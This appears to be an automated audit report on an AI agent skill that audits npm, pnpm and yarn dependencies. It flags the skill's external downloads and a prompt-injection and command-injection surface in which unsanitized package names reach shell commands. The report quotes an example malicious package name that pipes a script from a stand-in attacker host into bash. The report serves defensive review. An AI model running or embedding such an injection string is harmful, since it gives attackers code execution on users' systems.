dependency-audit
Pass
Audited by Gen Agent Trust Hub on Feb 17, 2026
Risk Level: SAFECOMMAND_EXECUTIONEXTERNAL_DOWNLOADS
Full Analysis
- [COMMAND_EXECUTION] (SAFE): The skill executes standard package manager commands such as
npm audit,pnpm outdated, andyarn audit. These operations are inherent to the skill's purpose and are expected behavior.\n- [EXTERNAL_DOWNLOADS] (LOW): The skill invokesnpx license-checker, which downloads and executes the latest version of thelicense-checkerpackage from the npm registry. This is a common practice for this functionality but relies on an external, third-party source.\n- [INDIRECT_PROMPT_INJECTION] (LOW): The skill exhibits a vulnerability surface for command injection due to how it handles project data.\n - Ingestion points: The skill reads package names directly from
package.jsonand tool outputs inagents/dep-auditor.mdandcommands/audit-deps.md.\n - Boundary markers: There are no explicit instructions or delimiters to prevent the model from executing malicious strings embedded in these files.\n
- Capability inventory: The agent has access to a bash environment and commands like
npm explain [package-name],pnpm why [package-name], andnpm update [package].\n - Sanitization: No sanitization or escaping is applied to package names before they are interpolated into shell commands. A malicious actor could exploit this by naming a dependency with shell metacharacters (e.g.,
"; curl attacker.com/exploit | bash ;") to achieve arbitrary code execution.
Audit Metadata